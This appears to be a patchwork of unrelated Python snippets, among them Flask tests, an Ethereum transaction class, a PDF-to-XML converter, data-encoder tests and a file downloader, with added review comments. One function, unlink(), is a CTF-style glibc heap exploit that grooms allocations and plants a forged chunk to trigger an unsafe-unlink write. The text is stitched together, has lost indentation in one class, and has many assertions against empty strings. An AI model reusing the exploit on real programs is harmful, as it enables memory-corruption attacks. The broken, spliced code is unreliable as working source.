            self.assertFalse((b'' in output.data))
            self.assertFalse((b'' in output.data))

    def test_filter_admin_true(self):
        """admin=True returns only admin users."""
        with login_user(self.flask_app, self.admin):
            output = self.client.get('/users?admin=True')
            self.assertEqual(200, output.status_code)
            self.assertTrue((b'' in output.data))
            self.assertFalse((b'' in output.data))

    def test_filter_admin_false(self):
        """admin=False returns only non-admin users."""
        with login_user(self.flask_app, self.admin):
            output = self.client.get('/users?admin=False')
            self.assertEqual(200, output.status_code)
            self.assertFalse((b'' in output.data))
            self.assertTrue((b'' in output.data))

    def test_filter_admin_wrong(self):
        """An unparseable admin value is ignored; all users are shown."""
        with login_user(self.flask_app, self.admin):
            output = self.client.get('/users?admin=dummy')
            self.assertEqual(200, output.status_code)
            self.assertTrue((b'' in output.data))
            self.assertTrue((b'' in output.data))

    def test_filter_active_true(self):
        """active=True hides an inactive user."""
        user = models.User(email='', username='inactive', active=False)
        user_social_auth = social_models.UserSocialAuth(user_id=user.id, user=user)
        self.session.add(user)
        self.session.add(user_social_auth)
        self.session.commit()
        with login_user(self.flask_app, self.admin):
            output = self.client.get('/users?active=True')
            self.assertEqual(200, output.status_code)
            self.assertTrue((b'' in output.data))
            self.assertTrue((b'' in output.data))
            self.assertFalse((b'' in output.data))

    def test_filter_active_false(self):
        """active=False shows only the inactive user."""
        user = models.User(email='', username='inactive', active=False)
        user_social_auth = social_models.UserSocialAuth(user_id=user.id, user=user)
        self.session.add(user)
        self.session.add(user_social_auth)
        self.session.commit()
        with login_user(self.flask_app, self.admin):
            output = self.client.get('/users?active=False')
            self.assertEqual(200, output.status_code)
            self.assertFalse((b'' in output.data))
            self.assertFalse((b'' in output.data))
            self.assertTrue((b'' in output.data))

    def test_filter_active_wrong(self):
        """An unparseable active value is ignored; all users are shown."""
        user = models.User(email='', username='inactive', active=False)
        user_social_auth = social_models.UserSocialAuth(user_id=user.id, user=user)
        self.session.add(user)
        self.session.add(user_social_auth)
        self.session.commit()
        with login_user(self.flask_app, self.admin):
            output = self.client.get('/users?active=dummy')
            self.assertEqual(200, output.status_code)
            self.assertTrue((b'' in output.data))
            self.assertTrue((b'' in output.data))
            self.assertTrue((b'' in output.data))

    def test_sql_exception(self):
        """A SQLAlchemy error during filtering is surfaced on the page."""
        with mock.patch.object(Query, 'filter_by', mock.Mock(side_effect=[SQLAlchemyError('SQLError'), None])):
            with login_user(self.flask_app, self.admin):
                output = self.client.get('/users?user_id=dummy')
                self.assertEqual(200, output.status_code)
                self.assertTrue((b'SQLError' in output.data))
                self.assertFalse((b'' in output.data))
                self.assertFalse((b'' in output.data))
class ArrowGlacierUnsignedLegacyTransaction(LondonUnsignedLegacyTransaction):
    """Unsigned legacy-format transaction for the Arrow Glacier fork."""

    def as_signed_transaction(self, private_key: PrivateKey, chain_id: int=None) -> ArrowGlacierLegacyTransaction:
        """Sign this transaction with *private_key* and return the signed
        Arrow Glacier legacy transaction.

        NOTE(review): chain_id handling (presumably EIP-155 replay protection
        when given) is delegated to create_transaction_signature — confirm there.
        """
        (v, r, s) = create_transaction_signature(self, private_key, chain_id=chain_id)
        return ArrowGlacierLegacyTransaction(nonce=self.nonce, gas_price=self.gas_price, gas=self.gas, to=self.to, value=self.value, data=self.data, v=v, r=r, s=s)
class Object(Entity):
    """Entity subclass describing a simulated object with sensors, actuators
    and engine states.

    NOTE(review): make/pre_make/check_spec take ``cls`` but carry no
    ``@classmethod`` decorator here — presumably the framework's registration
    machinery wraps them externally; confirm before calling directly.
    """

    # Registry metadata: argument groups consumed by make().
    INFO = {'make': ['sensors', 'actuators', 'engine_states']}

    def make(cls, *args: Any, **kwargs: Any):
        """Construct this object's spec (abstract; subclasses implement)."""
        pass

    def pre_make(cls, entity_id, entity_type):
        """Build the base ObjectSpec: seed the config with empty
        sensor/actuator/state lists and per-component parameter dicts."""
        spec = super().pre_make(entity_id, entity_type)
        params = spec.params
        # entity_id is moved out of the raw params into the config block.
        params['config'] = dict(name=None, sensors=[], actuators=[], states=[], entity_id=params.pop('entity_id'))
        params['sensors'] = dict()
        params['actuators'] = dict()
        params['states'] = dict()
        # Imported here to avoid a circular import at module load time —
        # presumably; confirm against eagerx.core.specs.
        from eagerx.core.specs import ObjectSpec
        return ObjectSpec(params)

    def check_spec(cls, spec):
        """Validate the spec: every declared state must define a valid space."""
        super().check_spec(spec)
        entity_id = spec.config.entity_id
        name = spec.config.name
        for component in ['states']:
            for (cname, params) in getattr(spec, component).items():
                msg = f'"{cname}" was defined as {component[:(- 1)]} in "{name}", but its space ({type(params.space)}) is not a valid space. Check the spec of "{entity_id}".'
                assert (params.space is not None), msg

    def example_engine(self, spec: 'ObjectSpec', graph: 'EngineGraph') -> None:
        """Placeholder engine implementation used only for documentation."""
        raise NotImplementedError('This is a mock engine implementation for documentation purposes.')
class Scene(QCScene):
    """One scene entry from a QC config: reads its attributes and renders an
    image via Connectome Workbench's ``wb_command -show-scene``."""

    def __init__(self, attributes):
        # NOTE(review): QCScene.__init__ is not invoked — presumably the base
        # class only declares the interface; confirm.
        self._attributes = attributes
        self.name = self._get_attribute('Name')
        self.make_index = self._get_attribute('MakeIndex')
        self.index = self._get_attribute('Idx')
        self.split_horizontal = self._get_attribute('SplitHorizontal')
        self.save_image = self._get_attribute('Keep')
        self.order = self._get_attribute('Order')
        # 'manditory' (sic) is the keyword _get_attribute actually accepts;
        # do not "fix" the spelling here.
        self.index_title = self._get_attribute('IndexTitle', manditory=False)
        self.subject_title = self._get_attribute('PreTitle', manditory=False)
        self.width = self.__get_width()
        self.height = self.__get_height()

    def make_image(self, output_loc, scene_file, logging='WARNING'):
        """Render this scene to *output_loc*; when SplitHorizontal is set the
        image is re-laid out top/bottom halves side-by-side. The final path is
        stored on ``self.path``."""
        if self.split_horizontal:
            self.path = self.__split(output_loc, scene_file, logging, self.width, self.height)
            return
        self.__show_scene(output_loc, scene_file, logging, self.width, self.height)
        self.path = output_loc

    def __get_width(self):
        """Scene width in pixels, defaulting to 600 when unset."""
        width = self._get_attribute('Width', manditory=False)
        if (not width):
            width = 600
        return width

    def __get_height(self):
        """Scene height in pixels, defaulting to 400 when unset."""
        height = self._get_attribute('Height', manditory=False)
        if (not height):
            height = 400
        return height

    def __show_scene(self, output, scene_file, logging, width, height):
        # Shell out to Workbench to rasterize the scene at the given size.
        run(['wb_command', '-logging', logging, '-show-scene', scene_file, str(self.index), output, str(width), str(height)])

    def __split(self, output_loc, scene_file, logging, width, height):
        """Render the scene, then crop it into top/bottom halves and paste
        them side-by-side into a double-width image."""
        with TempDir() as tmp_dir:
            tmp_img = os.path.join(tmp_dir, 'scene{}.png'.format(self.index))
            self.__show_scene(tmp_img, scene_file, logging, width, height)
            with Image.open(tmp_img) as img:
                half_the_height = (height // 2)
                img_top = img.crop((0, 0, width, half_the_height))
                img_btm = img.crop((0, half_the_height, width, height))
                im2 = Image.new('RGBA', (int((width * 2)), half_the_height))
                im2.paste(img_top, (0, 0))
                im2.paste(img_btm, (width, 0))
                im2.save(output_loc)
        return output_loc

    def __repr__(self):
        return '<ciftify.qc_config.Scene({})>'.format(self.name)

    def __str__(self):
        return self.name
class JsD3Bubble():
    """Registry entry pairing the D3 'gravity' chart type with the JavaScript
    snippet that reshapes tabular records into bubble data points."""

    # Short name used to look this entry up.
    alias = 'D3'
    # Chart types this transformation applies to.
    chartTypes = ['gravity']
    # Names the JS snippet expects to find in scope when evaluated.
    params = ('seriesNames', 'xAxis')
    # Raw JavaScript executed client-side: flattens each record into one
    # {Name, Count, Category, ...} object per non-zero series value.
    # (Runtime string — must be kept byte-for-byte.)
    value = "\n nbSeries = seriesNames.length;\n var temp = {}; var result = [];\n data.forEach(function(rec){\n for (var key in rec){\n if(key != xAxis && rec[key] != 0 && seriesNames.includes(key))\n { \n result.push({'Name': rec[xAxis], 'Count': rec[key], 'Category': key, 'nbSeries': nbSeries, 'xAxis': xAxis, 'seriesNames': seriesNames});\n } \n }\n });\n "
# The decorator was truncated to a bare `.parametrize(...)` (a syntax error);
# restored the conventional `@pytest.mark` prefix.
@pytest.mark.parametrize(
    'encoder, df_test, df_expected',
    [
        (
            DecisionTreeEncoder(),
            pd.DataFrame({'x': ['a', 'a', 'b', 'b', 'c', 'c'], 'y': [21, 30, 21, 30, 51, 40]}, index=[101, 105, 42, 76, 88, 92]),
            pd.DataFrame({'x': [25.5, 25.5, 25.5, 25.5, 45.5, 45.5]}, index=[101, 105, 42, 76, 88, 92]),
        ),
        (
            MeanEncoder(),
            pd.DataFrame({'x': ['a', 'a', 'b', 'b', 'c', 'c'], 'y': [1, 0, 1, 0, 1, 0]}, index=[101, 105, 42, 76, 88, 92]),
            pd.DataFrame({'x': [0.5, 0.5, 0.5, 0.5, 0.5, 0.5]}, index=[101, 105, 42, 76, 88, 92]),
        ),
        (
            OrdinalEncoder(encoding_method='ordered'),
            pd.DataFrame({'x': ['a', 'a', 'a', 'b', 'b', 'b', 'c', 'c', 'c'], 'y': [3, 3, 3, 2, 2, 2, 1, 1, 1]}, index=[33, 5412, 66, 99, 334, 1212, 22, 555, 1]),
            pd.DataFrame({'x': [2, 2, 2, 1, 1, 1, 0, 0, 0]}, index=[33, 5412, 66, 99, 334, 1212, 22, 555, 1]),
        ),
        (
            WoEEncoder(),
            pd.DataFrame({'x': ['a', 'a', 'b', 'b', 'c', 'c'], 'y': [1, 0, 1, 0, 1, 0]}, index=[101, 105, 42, 76, 88, 92]),
            pd.DataFrame({'x': [0.0, 0.0, 0.0, 0.0, 0.0, 0.0]}, index=[101, 105, 42, 76, 88, 92]),
        ),
    ],
)
def test_encoders_when_x_pandas_y_numpy(encoder, df_test, df_expected):
    """Encoders must accept X as a DataFrame with y as a plain numpy array and
    still produce the expected transform (preserving X's index)."""
    X = df_test[['x']]
    y = df_test['y']
    y_2 = y.to_numpy()
    df_result = encoder.fit_transform(X, y_2)
    assert df_result.equals(df_expected)
class TestContentMatcher(unittest.TestCase):
    """Unit tests for ContentMatcher: regex matching, case folding, inversion,
    match-count limits, whole-word and literal-pattern modes. Relies on the
    module-level fixtures ``text1`` / ``text2``."""

    def num_matches(self, pattern, text, **kwargs):
        """Count matching lines of *text* for *pattern* with the given options."""
        cm = ContentMatcher(pattern, **kwargs)
        return len(list(cm.match_file(StringIO(text))))

    def assertMatches(self, cm, text, exp_matches):
        """Assert cm matches *text* exactly as described by *exp_matches*:
        a list of (1-based line number, [(start, end), ...]) tuples."""
        matches = list(cm.match_file(StringIO(text)))
        self.assertEqual(len(matches), len(exp_matches))
        textlines = text.split('\n')
        for (n, exp_match) in enumerate(exp_matches):
            exp_matchresult = MatchResult((textlines[(exp_match[0] - 1)] + '\n'), exp_match[0], exp_match[1])
            self.assertEqual(exp_matchresult, matches[n])

    def test_defaults(self):
        """Default options: case-sensitive regex matching."""
        cm = ContentMatcher('line')
        self.assertMatches(cm, text1, [(1, [(5, 9)]), (2, [(8, 12)]), (3, [(9, 13), (24, 28)]), (6, [(9, 13)]), (7, [(5, 9), (15, 19), (35, 39)])])
        cm = ContentMatcher('Line')
        self.assertMatches(cm, text1, [(5, [(10, 14)])])
        cm = ContentMatcher('L[ix]ne')
        self.assertMatches(cm, text1, [(5, [(10, 14)])])
        cm = ContentMatcher('upper')
        self.assertMatches(cm, text1, [])

    def test_regex_match(self):
        """Patterns are treated as regexes by default (?, *, + are special)."""
        self.assertEqual(self.num_matches('yes\\?', text1), 1)
        self.assertEqual(self.num_matches('yes?', text1), 2)
        self.assertEqual(self.num_matches('vector', text1), 2)
        self.assertEqual(self.num_matches('vector *<', text1), 2)
        self.assertEqual(self.num_matches('vector +<', text1), 1)

    def test_id_regex_match_detailed(self):
        """Matching inside identifiers, plus ignore_case / invert_match combos."""
        t1 = 'some line with id_4 and vec8f too'
        self.assertEqual(self.num_matches('id_4', t1), 1)
        self.assertEqual(self.num_matches('8f', t1), 1)
        self.assertEqual(self.num_matches('[0-9]f', t1), 1)
        self.assertEqual(self.num_matches('8F', t1, ignore_case=True), 1)
        self.assertEqual(self.num_matches('84', t1, ignore_case=True), 0)
        self.assertEqual(self.num_matches('84', t1, invert_match=True), 1)

    def test_ignore_case(self):
        """ignore_case folds the pattern and the text."""
        cm = ContentMatcher('upper', ignore_case=True)
        self.assertMatches(cm, text1, [(5, [(0, 5)])])

    def test_invert_match(self):
        """invert_match reports non-matching lines (with empty span lists)."""
        cm = ContentMatcher('line', invert_match=True)
        self.assertMatches(cm, text1, [(4, []), (5, [])])
        cm = ContentMatcher('line', invert_match=True, ignore_case=True)
        self.assertMatches(cm, text1, [(4, [])])

    def test_max_count(self):
        """max_match_count caps the number of reported matching lines."""
        cm = ContentMatcher('line', max_match_count=1)
        self.assertMatches(cm, text1, [(1, [(5, 9)])])
        cm = ContentMatcher('line', max_match_count=2)
        self.assertMatches(cm, text1, [(1, [(5, 9)]), (2, [(8, 12)])])
        cm = ContentMatcher('a', max_match_count=1)
        self.assertMatches(cm, text1, [(2, [(0, 1)])])

    def test_whole_words(self):
        """whole_words matches only word-bounded occurrences.

        NOTE(review): the literal_pattern cases below look misplaced under
        this test name — confirm they were meant for a separate test.
        """
        cm = ContentMatcher('pie', whole_words=True)
        self.assertMatches(cm, text2, [(2, [(6, 9), (19, 22)]), (4, [(24, 27)])])
        cm = ContentMatcher('.*n', literal_pattern=True)
        self.assertMatches(cm, text2, [(4, [(5, 8)])])
        cm = ContentMatcher('$\\t', literal_pattern=True)
        self.assertMatches(cm, text2, [(3, [(10, 13)])])
        cm = ContentMatcher('$\\t', literal_pattern=False)
        self.assertMatches(cm, text2, [])
def test_gauss_edge0():
    """A constant (0th-order) polynomial must integrate to the same value on
    an edge regardless of the Gauss quadrature order."""
    print('0th Order Polynomial')
    print('Edge')
    integrals = []
    for order in (1, 2, 3):
        gaussEdge.setOrder(order)
        value = dot(f0(gaussEdge.points), gaussEdge.weights)
        print(value)
        integrals.append(value)
    npt.assert_almost_equal(integrals[0], integrals[1])
    npt.assert_almost_equal(integrals[1], integrals[2])
def test_set_voltage_pv1(power: PowerSupply, multi: Multimeter):
    """Sweep PV1 across -5..5 V and check the multimeter reads back each
    setpoint within the (doubled) tolerance."""
    setpoints = np.arange((- 5), 5, 0.1)
    readings = np.zeros(len(setpoints))
    for (index, setpoint) in enumerate(setpoints):
        power.pv1 = setpoint
        readings[index] = multi.measure_voltage('CH1')
    assert (readings == pytest.approx(setpoints, rel=(RELTOL * 2), abs=(ABSTOL * 2)))
class Command(BaseCommand):
    help = __doc__

    def handle(self, *args, **kwargs):
        """Find the newest 'BNF Snomed Mapping data <date>.zip' linked from the
        NHSBSA page, download it into a datestamped pipeline directory and
        extract it. Skips work if an .xlsx is already present for that release.
        """
        # NOTE(review): the URL literal was truncated in this file; this is the
        # NHSBSA BNF/SNOMED mapping page the filename pattern corresponds to —
        # confirm against the original source.
        page_url = 'https://www.nhsbsa.nhs.uk/prescription-data/understanding-our-data/bnf-snomed-mapping'
        filename_re = re.compile('^BNF Snomed Mapping data (?P<date>20\\d{6})\\.zip$', re.IGNORECASE)
        rsp = requests.get(page_url)
        rsp.raise_for_status()
        doc = BeautifulSoup(rsp.text, 'html.parser')
        # Collect every link whose (decoded) filename matches the pattern.
        matches = []
        for a_tag in doc.find_all('a', href=True):
            url = urljoin(page_url, a_tag['href'])
            filename = Path(unquote(urlparse(url).path)).name
            match = filename_re.match(filename)
            if match:
                matches.append((match.group('date'), url, filename))
        if not matches:
            raise RuntimeError(f'Found no URLs matching {filename_re} at {page_url}')
        # Sorting datestamp-first puts the most recent release last.
        matches.sort()
        (datestamp, url, filename) = matches[-1]
        release_date = datestamp[:4] + '_' + datestamp[4:6] + '_' + datestamp[6:]
        dir_path = os.path.join(settings.PIPELINE_DATA_BASEDIR, 'bnf_snomed_mapping', release_date)
        zip_path = os.path.join(dir_path, filename)
        # Already downloaded and extracted for this release: nothing to do.
        if glob.glob(os.path.join(dir_path, '*.xlsx')):
            return
        mkdir_p(dir_path)
        rsp = requests.get(url, stream=True)
        rsp.raise_for_status()
        with open(zip_path, 'wb') as f:
            for block in rsp.iter_content(32 * 1024):
                f.write(block)
        with zipfile.ZipFile(zip_path) as zf:
            zf.extractall(dir_path)
def vote(probs):
    """Return a consensus score from a list of per-source scores.

    After sorting: if the lower-tercile element is >= 1, lean positive
    (tercile value + 1); if the upper-tercile element is <= -1, lean negative
    (tercile value - 1); otherwise return the median. Empty input yields 0.
    """
    if not probs:
        return 0
    probs = sorted(probs)
    n = len(probs)
    # // keeps indices integral — the original used Python-2 `/`, which is a
    # float on Python 3 and raises TypeError when used as a list index.
    if probs[n // 3] >= 1:
        return probs[n // 3] + 1
    elif probs[(n * 2) // 3] <= -1:
        return probs[(n * 2) // 3] - 1
    else:
        return probs[n // 2]
def unlink():
    """Heap-exploitation sequence (CTF-style): groom the heap, then plant a
    forged chunk whose fd/bk bracket ``small_ptr`` and trigger a free.

    NOTE(review): depends on keep/wipe/renew helpers and small_ptr defined
    elsewhere in the script; the exact allocator technique (looks like an
    unsafe-unlink / fake-chunk overlap against glibc malloc) cannot be fully
    confirmed from this excerpt.
    """
    # Groom: alternate allocations and frees to line up chunk reuse.
    keep(1)
    wipe(1)
    keep(2)
    wipe(1)
    keep(1)
    keep(3)
    wipe(3)
    keep(3)
    # Forged chunk header: prev_size=0, size=0x21, then fd/bk pointing just
    # before small_ptr so the unlink write lands on it, followed by
    # prev_size/size fields for the adjacent chunk.
    payload = p64(0)
    payload += p64(33)
    payload += p64((small_ptr - 24))
    payload += p64((small_ptr - 16))
    payload += p64(32)
    payload += p64(400016)
    # Write the forged metadata into slot 2, then free slot 3 to trigger the
    # corrupted consolidation/unlink.
    renew(2, payload)
    wipe(3)
def _normal_faba(award):
    """Build one FinancialAccountsByAwards fixture row for *award*, wired to a
    per-award toptier agency, the COVID DEFC 'M', and a treasury account."""
    agency = baker.make(
        'references.ToptierAgency',
        name=f'Agency 00{award.award_id}',
        toptier_code=f'00{award.award_id}',
    )
    baker.make('references.Agency', toptier_agency=agency, toptier_flag=True, _fill_optional=True)
    covid_defc = baker.make(
        'references.DisasterEmergencyFundCode',
        code='M',
        public_law='PUBLIC LAW FOR CODE M',
        title='TITLE FOR CODE M',
        group_name='covid_19',
    )
    federal_account = baker.make(
        'accounts.FederalAccount',
        federal_account_code='001-0000',
        account_title='FA 1',
        parent_toptier_agency=agency,
    )
    treasury_account = baker.make(
        'accounts.TreasuryAppropriationAccount',
        budget_function_code=100,
        budget_function_title='NAME 1',
        budget_subfunction_code=1100,
        budget_subfunction_title='NAME 1A',
        account_title='TA 1',
        tas_rendering_label='001-X-0000-000',
        federal_account=federal_account,
        funding_toptier_agency=agency,
    )
    return baker.make(
        'awards.FinancialAccountsByAwards',
        award=award,
        treasury_account=treasury_account,
        piid='piid 1',
        parent_award_id='same parent award',
        fain='fain 1',
        uri='uri 1',
        disaster_emergency_fund=covid_defc,
        submission=SubmissionAttributes.objects.all().first(),
        gross_outlay_amount_by_award_cpe=8,
    )
class XMLConverter(PDFConverter):
CONTROL = re.compile('[\\x00-\\x08\\x0b-\\x0c\\x0e-\\x1f]')
def __init__(self, rsrcmgr, outfp, pageno=1, laparams=None, imagewriter=None, stripcontrol=False):
PDFConverter.__init__(self, rsrcmgr, outfp, pageno=pageno, laparams=laparams)
self.imagewriter = imagewriter
self.stripcontrol = stripcontrol
self.write_header()
return
def write_header(self):
self.outfp.write('<?xml version="1.0" encoding="utf-8" ?>\n')
self.outfp.write('<pages>\n')
return
def write_footer(self):
self.outfp.write('</pages>\n')
return
def write_text(self, text):
if self.stripcontrol:
text = self.CONTROL.sub(u'', text)
self.outfp.write(q(text))
return
def receive_layout(self, ltpage):
def show_group(item):
if isinstance(item, LTTextBox):
self.outfp.write(('<textbox id="%d" bbox="%s" />\n' % (item.index, bbox2str(item.bbox))))
elif isinstance(item, LTTextGroup):
self.outfp.write(('<textgroup bbox="%s">\n' % bbox2str(item.bbox)))
for child in item:
show_group(child)
self.outfp.write('</textgroup>\n')
return
def render(item):
if isinstance(item, LTPage):
self.outfp.write(('<page id="%s" bbox="%s" rotate="%d">\n' % (item.pageid, bbox2str(item.bbox), item.rotate)))
for child in item:
render(child)
if (item.groups is not None):
self.outfp.write('<layout>\n')
for group in item.groups:
show_group(group)
self.outfp.write('</layout>\n')
self.outfp.write('</page>\n')
elif isinstance(item, LTLine):
self.outfp.write(('<line linewidth="%d" bbox="%s" />\n' % (item.linewidth, bbox2str(item.bbox))))
elif isinstance(item, LTRect):
self.outfp.write(('<rect linewidth="%d" bbox="%s" />\n' % (item.linewidth, bbox2str(item.bbox))))
elif isinstance(item, LTCurve):
self.outfp.write(('<curve linewidth="%d" bbox="%s" pts="%s"/>\n' % (item.linewidth, bbox2str(item.bbox), item.get_pts())))
elif isinstance(item, LTFigure):
self.outfp.write(('<figure name="%s" bbox="%s">\n' % (item.name, bbox2str(item.bbox))))
for child in item:
render(child)
self.outfp.write('</figure>\n')
elif isinstance(item, LTTextLine):
self.outfp.write(('<textline bbox="%s">\n' % bbox2str(item.bbox)))
for child in item:
render(child)
self.outfp.write('</textline>\n')
elif isinstance(item, LTTextBox):
wmode = ''
if isinstance(item, LTTextBoxVertical):
wmode = ' wmode="vertical"'
self.outfp.write(('<textbox id="%d" bbox="%s"%s>\n' % (item.index, bbox2str(item.bbox), wmode)))
for child in item:
render(child)
self.outfp.write('</textbox>\n')
elif isinstance(item, LTChar):
self.outfp.write(('<text font="%s" bbox="%s" size="%.3f">' % (q(item.fontname), bbox2str(item.bbox), item.size)))
self.write_text(item.get_text())
self.outfp.write('</text>\n')
elif isinstance(item, LTText):
self.outfp.write(('<text>%s</text>\n' % item.get_text()))
elif isinstance(item, LTImage):
if (self.imagewriter is not None):
name = self.imagewriter.export_image(item)
self.outfp.write(('<image src="%s" width="%d" height="%d" />\n' % (q(name), item.width, item.height)))
else:
self.outfp.write(('<image width="%d" height="%d" />\n' % (item.width, item.height)))
else:
assert 0, item
return
render(ltpage)
return
def close(self):
    """Finish the document by emitting the trailing footer markup."""
    self.write_footer()
def test_perturbed_mediums_copy():
    """Smoke-test Scene.perturbed_mediums_copy on perturbation mediums.

    Without data arrays, perturbation mediums collapse to plain mediums;
    with temperature/charge data arrays they become custom (spatially
    varying) mediums.
    """
    # Real-valued heat-only perturbation.
    pp_real = td.ParameterPerturbation(heat=td.LinearHeatPerturbation(coeff=(- 0.01), temperature_ref=300, temperature_range=(200, 500)))
    # Complex heat perturbation combined with electron/hole charge perturbations.
    pp_complex = td.ParameterPerturbation(heat=td.LinearHeatPerturbation(coeff=0.01j, temperature_ref=300, temperature_range=(200, 500)), charge=td.LinearChargePerturbation(electron_coeff=(- 1e-21), electron_ref=0, electron_range=(0, 1e+20), hole_coeff=(- 2e-21), hole_ref=0, hole_range=(0, 5e+19)))
    # Uniform 2x2x2 sample fields used as perturbation inputs.
    coords = dict(x=[1, 2], y=[3, 4], z=[5, 6])
    temperature = td.SpatialDataArray((300 * np.ones((2, 2, 2))), coords=coords)
    electron_density = td.SpatialDataArray((1e+18 * np.ones((2, 2, 2))), coords=coords)
    hole_density = td.SpatialDataArray((2e+18 * np.ones((2, 2, 2))), coords=coords)
    pmed1 = td.PerturbationMedium(permittivity=3, permittivity_perturbation=pp_real)
    pmed2 = td.PerturbationPoleResidue(poles=[(1j, 3), (2j, 4)], poles_perturbation=[(None, pp_real), (pp_complex, None)])
    struct = td.Structure(geometry=td.Box(center=(0, 0, 0), size=(1, 1, 1)), medium=pmed2)
    scene = td.Scene(medium=pmed1, structures=[struct])
    # No perturbation data supplied: expect plain Medium / PoleResidue.
    new_scene = scene.perturbed_mediums_copy()
    assert isinstance(new_scene.medium, td.Medium)
    assert isinstance(new_scene.structures[0].medium, td.PoleResidue)
    # Various data combinations; only the last result is asserted on.
    new_scene = scene.perturbed_mediums_copy(temperature)
    new_scene = scene.perturbed_mediums_copy(temperature, None, hole_density)
    new_scene = scene.perturbed_mediums_copy(temperature, electron_density, hole_density)
    assert isinstance(new_scene.medium, td.CustomMedium)
    assert isinstance(new_scene.structures[0].medium, td.CustomPoleResidue)
def test_owly_short_method_bad_response_status():
    """A 4xx response from the ow.ly shorten API must raise ShorteningErrorException."""
    query = urlencode({'apiKey': 'TEST_KEY', 'longUrl': expanded})
    mocked_endpoint = f'{owly.api_url}shorten?{query}'
    # The payload key is intentionally malformed ('rerrsults'): the HTTP 400
    # status, not the body, is what should trigger the failure.
    payload = "{'rerrsults': {'shortUrl': shorten}}"
    responses.add(responses.GET, mocked_endpoint, body=payload, status=400, match_querystring=True)
    with pytest.raises(ShorteningErrorException):
        owly.short(expanded)
# NOTE(review): the marker below was truncated to `.parametrize(...)` (a bare
# leading-dot expression, i.e. a syntax error); restored assuming the file
# imports `pytest` — confirm against upstream.
@pytest.mark.parametrize('geometry', GEO_TYPES)
def test_to_gds(geometry, tmp_path):
    """Round-trip each geometry through a GDS file and check the cell contents."""
    fname = str(tmp_path / f'{geometry.__class__.__name__}.gds')
    geometry.to_gds_file(fname, z=0, gds_cell_name=geometry.__class__.__name__)
    cell = gdstk.read_gds(fname).cells[0]
    assert cell.name == geometry.__class__.__name__
    assert len(cell.polygons) > 0
    # A slice plane far outside the geometry must produce an empty cell.
    fname = str(tmp_path / f'{geometry.__class__.__name__}-empty.gds')
    geometry.to_gds_file(fname, y=1e+30, gds_cell_name=geometry.__class__.__name__)
    cell = gdstk.read_gds(fname).cells[0]
    assert cell.name == geometry.__class__.__name__
    assert len(cell.polygons) == 0
class ZshCompletion(CompletionPlugin):
    """Shell-completion plugin for Zsh.

    Zsh can consume Bash-style completion scripts, so every operation is
    delegated to the BashCompletion plugin.
    """

    def __init__(self, config_loader: ConfigLoader):
        super().__init__(config_loader)
        from hydra._internal.core_plugins.bash_completion import BashCompletion
        self.delegate = BashCompletion(config_loader)

    def install(self) -> None:
        self.delegate.install()

    def uninstall(self) -> None:
        self.delegate.uninstall()

    @staticmethod
    def provides() -> str:
        # NOTE(review): no self/cls parameter — restoring the apparently
        # stripped @staticmethod decorator (same for help/_get_exec below).
        return 'zsh'

    def query(self, config_name: Optional[str]) -> None:
        self.delegate.query(config_name)

    @staticmethod
    def help(command: str) -> str:
        assert (command in ['install', 'uninstall'])
        # NOTE(review): the markdown link target in this string appears to have
        # been stripped along with other URLs in this file.
        extra_description = 'Zsh is compatible with the Bash shell completion, see the [documentation]( for details.\n        '
        command_text = f'eval "$({{}} -sc {command}=bash)"'
        if (command == 'install'):
            return (extra_description + command_text)
        return command_text

    @staticmethod
    def _get_exec() -> str:
        from hydra._internal.core_plugins.bash_completion import BashCompletion
        return BashCompletion._get_exec()
# NOTE(review): the marker below was truncated to `.usefixtures(...)` (a syntax
# error at module level); restored assuming the file imports `pytest`.
@pytest.mark.usefixtures('use_tmpdir')
def test_that_a_failing_job_shows_error_message_with_context(opened_main_window_clean, qtbot):
    """A crashing forward-model job must surface its traceback in the fail dialog."""
    gui = opened_main_window_clean
    # Write an executable poly_eval.py that always raises.
    with open('poly_eval.py', 'w', encoding='utf-8') as f:
        f.write(dedent(' #!/usr/bin/env python\n\n if __name__ == "__main__":\n raise RuntimeError(\'Argh\')\n '))
    os.chmod('poly_eval.py', (((os.stat('poly_eval.py').st_mode | stat.S_IXUSR) | stat.S_IXGRP) | stat.S_IXOTH))
    with contextlib.suppress(FileNotFoundError):
        shutil.rmtree('poly_out')
    simulation_panel = get_child(gui, SimulationPanel)
    simulation_mode_combo = get_child(simulation_panel, QComboBox)
    simulation_mode_combo.setCurrentText(SingleTestRun.name())
    start_simulation = get_child(simulation_panel, QWidget, name='start_simulation')

    def handle_dialog():
        # Acknowledge the message box, then answer the run-path dialog.
        qtbot.mouseClick(wait_for_child(gui, qtbot, QMessageBox).buttons()[0], Qt.LeftButton)
        QTimer.singleShot(500, (lambda : handle_run_path_dialog(gui=gui, qtbot=qtbot, delete_run_path=False)))

    def handle_error_dialog(run_dialog):
        # Verify the failure dialog carries both the summary and the traceback.
        error_dialog = run_dialog.fail_msg_box
        assert error_dialog
        text = error_dialog.details_text.toPlainText()
        label = error_dialog.label_text.text()
        assert ('ERT experiment failed' in label)
        expected_substrings = ['Realization: 0 failed after reaching max submit (2)', 'job poly_eval failed', 'Process exited with status code 1', 'Traceback', "raise RuntimeError('Argh')", 'RuntimeError: Argh']
        for substring in expected_substrings:
            assert (substring in text)
        qtbot.mouseClick(error_dialog.box.buttons()[0], Qt.LeftButton)

    QTimer.singleShot(500, handle_dialog)
    qtbot.mouseClick(start_simulation, Qt.LeftButton)
    run_dialog = wait_for_child(gui, qtbot, RunDialog)
    qtbot.mouseClick(run_dialog.show_details_button, Qt.LeftButton)
    QTimer.singleShot(20000, (lambda : handle_error_dialog(run_dialog)))
    qtbot.waitUntil(run_dialog.done_button.isVisible, timeout=100000)
class CanaryDiffMapping(MappingTest):
    """Checks weighted canary routing between two Mappings sharing a prefix."""
    parent: AmbassadorTest
    target: ServiceType
    canary: ServiceType
    weight: int

    @classmethod
    def variants(cls) -> Generator[(Node, None, None)]:
        # NOTE(review): the `cls` first parameter implies this was declared
        # @classmethod; the decorator appears stripped in the source.
        for v in variants(ServiceType):
            for w in (0, 10, 50, 100):
                yield cls(v, v.clone('canary'), w, name='{self.target.name}-{self.weight}')

    def init(self, target: ServiceType, canary: ServiceType, weight):
        MappingTest.init(self, target)
        self.canary = canary
        self.weight = weight

    def config(self) -> Generator[(Union[(str, Tuple[(Node, str)])], None, None)]:
        # Main route plus a weighted canary route for the same prefix.
        yield (self.target, self.format('\n---\napiVersion: getambassador.io/v3alpha1\nkind: Mapping\nname: {self.name}\nhostname: "*"\nprefix: /{self.name}/\nservice: canary.1.example.com\n'))
